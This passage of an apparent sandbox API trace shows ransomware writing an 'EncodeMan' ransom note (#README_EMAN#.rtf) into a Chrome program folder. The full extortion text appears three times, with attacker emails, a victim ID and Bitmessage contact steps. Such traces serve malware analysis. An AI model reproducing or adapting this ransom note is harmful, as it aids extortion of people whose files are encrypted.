cchCount2=46) returned 1 [0207.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\cmm\\", cchCount1=43, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\", cchCount2=46) returned 1 [0207.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\", cchCount1=43, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\", cchCount2=46) returned 3 [0207.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\", cchCount1=45, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount2=39) returned 3 [0207.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\", cchCount1=35, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount2=39) returned 1 [0207.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\cmm\\", cchCount1=43, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount2=39) returned 3 [0207.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\bin\\", cchCount1=39, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount2=39) returned 1 [0207.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount1=39, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount2=39) returned 2 [0207.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\", cchCount1=45, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\", cchCount2=35) returned 3 [0207.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\", cchCount1=35, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\", cchCount2=35) returned 2 [0207.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\", cchCount1=45, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount2=39) returned 3 [0207.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\", cchCount1=35, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount2=39) returned 1 [0207.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\cmm\\", cchCount1=43, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount2=39) returned 3 [0207.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\bin\\", cchCount1=39, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount2=39) returned 1 [0207.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount1=39, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount2=39) returned 2 [0207.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\", cchCount1=45, lpString2="C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\", cchCount2=68) returned 1 [0207.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", cchCount1=68, lpString2="C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\", cchCount2=68) returned 3 [0207.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\management\\", cchCount1=50, lpString2="C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\", cchCount2=68) returned 1 [0207.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\", cchCount1=48, lpString2="C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\", cchCount2=68) returned 1 [0207.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\", cchCount1=68, lpString2="C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\", cchCount2=68) returned 2 [0207.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\", cchCount1=45, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\", cchCount2=63) returned 3 [0207.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\", cchCount1=35, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\", cchCount2=63) returned 3 [0207.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps\\", cchCount1=76, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\", cchCount2=63) returned 3 [0207.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\", cchCount1=63, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\", cchCount2=63) returned 2 [0207.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\", cchCount1=45, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\", cchCount2=43) returned 3 [0207.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\", cchCount1=35, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\", cchCount2=43) returned 1 [0207.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\cmm\\", cchCount1=43, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\", cchCount2=43) returned 1 [0207.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\", cchCount1=46, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\", cchCount2=43) returned 1 [0207.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\", cchCount1=43, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\", cchCount2=43) returned 2 [0207.580] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\#README_EMAN#.rtf" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\#readme_eman#.rtf")) returned 0xffffffff [0207.580] GetLastError () returned 0x2 [0207.580] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\#README_EMAN#.rtf" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f4 [0207.601] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0207.601] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0207.601] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 